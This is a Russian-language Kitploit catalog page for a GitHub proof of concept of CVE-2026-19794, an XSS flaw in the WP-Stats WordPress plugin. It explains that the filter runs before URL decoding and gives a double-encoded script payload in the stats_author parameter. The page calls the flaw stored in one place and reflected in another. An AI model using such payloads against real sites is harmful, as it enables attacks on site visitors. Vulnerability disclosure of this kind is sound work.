Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-19794 — WP-Stats <= 2.56 — неаутентифицированная хранимая межсайтовая скриптовая атака | Kitploit
Инструменты/GitHubGitHub/testardou/cve-2026-19794
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и Исследования
GitHubtestardou/cve-2026-19794

CVE-2026-19794

WP-Stats <= 2.56 — неаутентифицированная хранимая межсайтовая скриптовая атака

Репозиторий
14 ч 22 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-19794

WP-Stats <= 2.56 - Неаутентифицированное хранимое межсайтовое скриптовое внедрение

URL плагина

https://wordpress.org/plugins/wp-stats/

Описание

Неаутентифицированное отражённое XSS в GET-параметре stats_author функции stats_page(). Фильтр очистки strip_tags() применяется до urldecode(), что позволяет злоумышленнику обойти его путём двойного URL-кодирования полезной нагрузки.

POC

  1. Установите и активируйте плагин WP-Stats
  2. Создайте страницу или запись с шорткодом [page_stats]
  3. Перейдите по адресу: http://TARGET/PATH_TO_PAGE_OR_POST/?stats_author=%253Cscript%253Ealert(document.domain)%253C%252Fscript%253E
Скачать инструмент